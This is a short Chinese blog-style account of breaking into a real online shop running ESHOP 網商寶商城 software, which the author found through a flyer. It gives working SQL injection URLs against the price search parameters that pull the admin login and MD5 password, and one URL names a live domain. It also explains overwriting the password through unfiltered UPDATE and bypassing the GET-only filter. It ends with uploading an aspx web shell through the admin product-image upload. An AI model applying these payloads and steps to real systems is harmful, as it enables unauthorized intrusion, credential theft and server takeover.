某天起床比較晚,起來發現地上有傳單。
看了下是個網店。
于是想看看用的什么程序,找了下(看html注釋,css注釋,文件名)。發現是ESHOP網商寶商城。
google下漏洞,發現有eshop的漏洞,測試了下,不對啊。不過還是報錯了。結果發現有其他的網店系統叫ESHOP。
放了兩天,然后想起了再來測試下注入,它有過濾代碼的。下了源碼看了下。結果沒有過濾select關鍵字。
在前臺搜索處,價格從 到 哪里發現一處數字型注入點。
結合代碼里找到的管理員表名和列名。然后就可以爆了。
http://xxxx.com/p_list.aspx?keyword=%&maxPrice=0&minPrice=0 and (select top 1 admin from admin)>0
// 第一個管理員的登錄名
http://www.badguest.cn /p_list.aspx?keyword=%&maxPrice=0&minPrice=0 and (select top 1 password from admin)>0
//密碼。標準md5的,大家懂的。
放注入的地方還沒有過濾update。所以密碼反查不出來,可以更新哦。還有一點,這個過濾代碼只過濾了get方式的。
進入后臺后。產品系統-》產品內容-》列表圖片哪里可以直接傳aspx文件。關于路徑,直接傳aspx不能顯示路徑,所以先直接傳jpg的把路徑搞到手,再傳aspx的就KO了。
打完收工。
PS:監測而已,不搞破壞的。